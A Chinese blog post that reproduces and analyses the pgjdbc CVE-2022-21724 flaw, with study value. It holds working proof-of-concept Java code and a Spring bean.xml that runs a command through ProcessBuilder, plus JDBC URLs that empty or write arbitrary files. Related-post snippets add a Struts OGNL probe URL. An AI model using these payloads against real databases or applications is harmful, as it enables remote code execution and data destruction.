任意代码执行漏洞复现

已于 2022-11-20 14:38:11 修改
阅读量1.1k 收藏 3
点赞数 1
文章标签: web安全 安全 网络安全 渗透测试 信息安全
于 2022-11-20 13:51:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali_Ma/article/details/127948143
版权

漏洞简介

在 PostgreSQL 数据库的 jdbc 驱动程序中发现一个安全漏洞。当攻击者控制 jdbc url 或者属性时,使用 PostgreSQL 数据库的系统将受到攻击。 pgjdbc 根据通过 authenticationPluginClassNamesslhostnameverifiersocketFactorysslfactorysslpasswordcallback 连接属性提供类名实例化插件实例。但是,驱动程序在实例化类之前没有验证类是否实现了预期的接口。这可能导致通过任意类加载远程代码执行。

影响范围:

  9.4.1208 <=PgJDBC <42.2.25

  42.3.0 <=PgJDBC < 42.3.2

【一一帮助安全学习,所有梓料获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部教程

漏洞复现

创建 maven 项目,添加依赖

<!-- https://mvnrepository.com/artifact/org.postgresql/postgresql -->
<dependency>
    <groupId>org.postgresql</groupId>
    <artifactId>postgresql</artifactId>
    <version>42.3.1</version>
</dependency>
<!-- https://mvnrepository.com/artifact/org.springframework/spring-context-support -->
<dependency>
    <groupId>org.springframework</groupId>
    <artifactId>spring-context-support</artifactId>
    <version>5.3.23</version>
</dependency>

编写测试代码

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class cve202221724 {
    public static void main(String[] args) throws SQLException {
        String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
        String socketFactoryArg = "http://127.0.0.1:8080/bean.xml";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test/?socketFactory="+socketFactoryClass+ "&socketFactoryArg="+socketFactoryArg;
        Connection connection = DriverManager.getConnection(jdbcUrl);
    }
}

bean.xml

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:p="http://www.springframework.org/schema/p"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
 http://www.springframework.org/schema/beans/spring-beans.xsd">
<!--    普通方式创建类-->
   <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value>calc.exe</value>
          </list>
        </constructor-arg>
    </bean>
</beans>

image.png

漏洞分析

任意代码执行 socketFactory/socketFactoryArg
image.png

先将调试后的流程大概画出

image.png

java.sql.DriverManager#getConnection(java.lang.String)
image.png

java.sql.DriverManager#getConnection(java.lang.String, java.util.Properties, java.lang.Class<?>)
image.png

利用 org.postgresql.Driver 的 jdbc 驱动去连接数据库

org.postgresql.Driver#connect
image.png

调用 makeConnection 去连接数据库

org.postgresql.Driver#makeConnection
image.png

org.postgresql.jdbc.PgConnection#PgConnection
image.png

org.postgresql.core.ConnectionFactory#openConnection
image.png

org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
image.png

org.postgresql.core.SocketFactoryFactory#getSocketFactory
image.png

PGProperty 是枚举类型 其中的 get 方法是判断枚举项的值有没有传入的 properties,如果存在就查找返回,没有就返回默认值
image.png

SOCKET_FACTORY(
      "socketFactory",
      null,
      "Specify a socket factory for socket creation"),
  SOCKET_FACTORY_ARG(
      "socketFactoryArg",
      null,
      "Argument forwarded to constructor of SocketFactory class."),

org.postgresql.util.ObjectFactory#instantiate
image.png

通过 newInstance 来实现对 ctor 类 的创建,同时 args 作为参数。构造方法中有且只有一个 String 参数的类就可以满足条件。

  • org.apache.commons.jxpath.functions.ConstructorFunction
  • org.apache.commons.jxpath.functions.MethodFunction
  • java.io.FileOutputStream

通过利用 CVE-2017-17485 实现 Spring spel 执行任意命令 或者利用 FileOutputStream 将任意文件置空(jdbc:postgresql://127.0.0.1:5432/test/?socketFactory=java.io.FileOutputStream&socketFactoryArg=test.txt)

任意代码执行 sslfactory/sslfactoryarg

image.png
image.png

image.png

<init>:85, ClassPathXmlApplicationContext (org.springframework.context.support)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
instantiate:62, ObjectFactory (org.postgresql.util)
getSslSocketFactory:64, SocketFactoryFactory (org.postgresql.core)
convert:34, MakeSSL (org.postgresql.ssl)
enableSSL:546, ConnectionFactoryImpl (org.postgresql.core.v3)
tryConnect:151, ConnectionFactoryImpl (org.postgresql.core.v3)
openConnectionImpl:215, ConnectionFactoryImpl (org.postgresql.core.v3)
openConnection:51, ConnectionFactory (org.postgresql.core)
<init>:225, PgConnection (org.postgresql.jdbc)
makeConnection:466, Driver (org.postgresql)
connect:265, Driver (org.postgresql)
getConnection:664, DriverManager (java.sql)
getConnection:270, DriverManager (java.sql)
main:17, cve202221724

org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl
image.png

尝试与数据库进行连接

org.postgresql.core.v3.ConnectionFactoryImpl#tryConnect
image.png

建立连接后收到请求以 S 开头,进入 org.postgresql.ssl.MakeSSL#convert

org.postgresql.core.v3.ConnectionFactoryImpl#enableSSL
image.png
image.png

org.postgresql.ssl.MakeSSL#convert
image.png

org.postgresql.core.SocketFactoryFactory#getSslSocketFactory

image.png

任意文件写入 loggerLevel/loggerFile

image.png
image.png

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class cve202221724 {
    public static void main(String[] args) throws SQLException {
        String loggerLevel = "debug";
        String loggerFile = "test.txt";
        String shellContent="test";
        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
        Connection connection = DriverManager.getConnection(jdbcUrl);
    }
}

image.png

org.postgresql.Driver#connect
image.png

org.postgresql.Driver#setupLoggerFromProperties
image.png

通过 设置扩展参数 LOGGER_FILE 指定日志文件保存位置,没有进行校验,所以可以跨目录的保存文件
image.png

生成临时文件,之后将日志信息保存到文件中

org.postgresql.Driver#connect

先通过 setupLoggerFromProperties 设定相关的参数 然后再利用 LOGGER.log 保存文件
image.png

漏洞修复

针对代码执行的漏洞而言,要求获取的类名必须是指定类的子类,否则就抛出异常
image.png

对于任意文件写入而言,高版本中移除了对日志文件的设定操作 setupLoggerFromProperties(props);
image.png

kali_Ma
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Vim任意代码执行漏洞(CVE-2019-12735)
Sylon的博客
06-10 2363
Vim通过Modelines执行任意代码 漏洞概要: 在8.1.1365之前的Vim和在0.3.6之前的Neovim很容易通过打开特制的文本文件而通过模型执行任意代码复现条件: 确保未禁用modeline选项(:set modeline)。 开启 modeline # vim /usr/share/vim/vimrc 大概在50行写入 :set modeline 复现过程: 1....
ref:CodeIgniter框架内核设计缺陷可能导致任意代码执行
weixin_30644369的博客
06-26 373
ref:https://www.seebug.org/vuldb/ssvid-96217 简要描述: 为准备乌云深圳沙龙,准备几个0day做案例。 官方承认这个问题,说明会发布补丁,但不愿承认这是个『漏洞』……不过也无所谓,反正是不是都没美刀~ 详细说明: CI在加载模板的时候,会调用 $this->load->view('template_name', $data)...
Codeigniter 利用加密Key(密钥)的对象注入漏洞
收集盒 Book box
09-10 1366
原文链接:http://www.mehmetince.net/codeigniter-object-injection-vulnerability-via-encryption-key/ 0x00 背景 大家好,Codeigniter 是我最喜爱的PHP框架之一。和别人一样,我在这个框架中学习了PHP MVC编程。今天,我决定来分析一下Codeigniter的PHP 对象注入漏洞。 我在
任意代码执行(简称ACE)是指攻击者能够讓目标電腦或目标进程中执行任意命令或代码
最新发布
weixin_40191861的博客
11-08 110
(简称ACE)是指攻击者能够讓目标電腦或目标中执行任意命令或代码。如果系統有地方可以被以執行任意代碼,則此處被稱為。特別設計利用此一漏洞的程式,稱為。可以通过网络(尤其是通过互联网等广域网)讓目标電腦(遠程電腦)執行任意代码的能力稱為(RCE)。
任意代码执行(简称ACE)是指攻击者能够讓目标電腦或目标进程中执行任意命令或代码
weixin_40191861的博客
08-21 225
(简称ACE)是指攻击者能够讓目标電腦或目标中执行任意命令或代码。如果系統有地方可以被以執行任意代碼,則此處被稱為。特別設計利用此一漏洞的程式,稱為。可以通过网络(尤其是通过互联网等广域网)讓目标電腦(遠程電腦)執行任意代码的能力稱為(RCE)。
任意代码执行漏洞
weixin_34144450的博客
07-25 466
0x00 什么是任意代码执行当应用在调用一些能将字符串转化成代码的函数(如PHP重的eval)时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中,如PHP的eval函数,可以将字符串代表的代码作为PHP代码执行,当用户能够控制这段字符串时,将产生代码注入漏洞(也称命令执行)。广义上的代码注入,可以覆盖大半安全漏洞的分类。...
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
**WPS Office 代码执行漏洞 (QVD-2023-17241) 深度解析** WPS Office 是一款由金山软件开发的办公软件套装,包括文字处理、电子表格、演示文稿等多种组件,广泛应用于个人和企业环境中。然而,随着软件的普及,安全...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
Codeigniter利用加密Key(密钥)的对象注入漏洞
01-30
大家好,Codeigniter是我最喜爱的PHP框架之一。和别人一样,我在这个框架中学习了PHP MVC编程。今天,我决定来分析一下Codeigniter的PHP对象注入漏洞。我在接下来的叙述中会把重点放在Codeigniter的Session会话机制上。所有我将会分析的method方法都在CodeIgniter/system/libraries/Session.php文件里。我在本研究过程中使用的是Codeigniter 2.1版本。0x01CodeigniterSess
CodeIgniter是一个简单快速的PHPMVC框架
08-08
CodeIgniter 是一个简单快速的PHP MVC 框架
S2-057 任意代码执行漏洞(CVE-2018-11776)
EC_Carrot的博客
08-13 239
漏洞简介 影响版本: <= Struts 2.3.34, Struts 2.5.16 详细请看:https://vulhub.org/#/environments/struts2/s2-057/ 漏洞复现 这次OGNL的解析在url上,我们可以先检验漏洞是否存在: http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action 可以看到访问后已经被执行了,当然在burp上更加能够体现! 先放个POC: ${(#dm=@
任意代码命令执行漏洞
cldimd的博客
03-21 1285
代码执行: 原理: 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞。 在php中: eval assert preg_replace(‘/*/e', '$ret = "\\1";',$data); 在asp中: e...
基于.NET动态编译技术实现任意代码执行
biyusr的专栏
07-15 318
当下主流的Waf或WindowsDefender等终端杀软、EDR大多都是从特征码查杀,在.Net和VBS下一句话木马中最常见的特征是eval,对于攻击者来说需要避开这个系统关键字,可从反序列化方式避开eval,但公开已久相信很多安全产品已经能够很好检测和阻断这类攻击请求。,而在.NET中eval只存在于Jscript.Net,所以需要将动态编译器指定为Jscript,其余和C#版本的动态编译基本一致,笔者通过插入无关字符将eval拆解掉,代码如下。...
php ci框架漏洞,CodeIgniter框架内核设计缺陷可能导致任意代码执行
weixin_42431577的博客
04-12 1616
### 简要描述:为准备乌云深圳沙龙,准备几个0day做案例。官方承认这个问题,说明会发布补丁,但不愿承认这是个『漏洞』……不过也无所谓,反正是不是都没美刀~### 详细说明:CI在加载模板的时候,会调用 $this->load->view('template_name', $data);内核中,查看view函数源码:/system/core/Loader.php```public f...
第十一天任意代码执行漏洞
代码审计
03-16 1480
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞代码执行 和 命令执行 代码执行 后端语言执行 php java .net nodejs 命令执行 调用系统接口 面试喜欢问 代码执行常见的函数 代码执行各函数之间的特点 代码执行如何修复 bypass disable fu nctiO
CodeIgniter4.x反序列化漏洞
小小猪的博客
11-10 2917
CodeIgniter4.x反序列化漏洞 CodeIgniter介绍: CodeIgniter 是一个为用 PHP 编写网络应用程序的人员提供的工具包。它的目标是实现让你比从零开始编写代码更快速地开发项目,为此,CI 提供了一套丰富的类库来满足通常的任务需求,并且提供了一个简单的接口和逻辑结构来调用这些库。CodeIgniter 可以将需要完成的任务代码量最小化,这样你就可以把更多的精力放到项目的开发上了。 漏洞介绍: 因部分函数过滤不合理,联合导致漏洞形成。CI框架建立于PHP>=7.2版本
vulfocus漏洞复现
08-21
根据引用的描述,已复现的Vulfocus靶场漏洞有spring代码执行(CVE-2018-1273)。该漏洞是指当使用Spring Framework版本4.3.5之前的应用程序中使用了Expression Language(SpEL)的功能时,攻击者可以通过构造特定的SpEL表达式来执行任意代码。这可能导致远程攻击者在受影响的应用程序上执行恶意代码。 除了Vulfocus漏洞复现之外,根据引用,Drupal曝出了一个远程代码执行漏洞(CVE-2018-7600),攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。 另外,引用提到了WordPress的远程代码执行漏洞(CVE-2016-10033),该漏洞利用了PHPMailer漏洞,在WordPress Core代码中体现,攻击者可以利用该漏洞执行代码。 总结来说,Vulfocus漏洞复现的其中一个例子是spring代码执行漏洞(CVE-2018-1273)。此外,还存在Drupal远程代码执行漏洞(CVE-2018-7600)和WordPress远程代码执行漏洞(CVE-2016-10033)。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[Vulfocus解题系列] 所复现漏洞总结](https://blog.csdn.net/qq_45813980/article/details/118720526)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值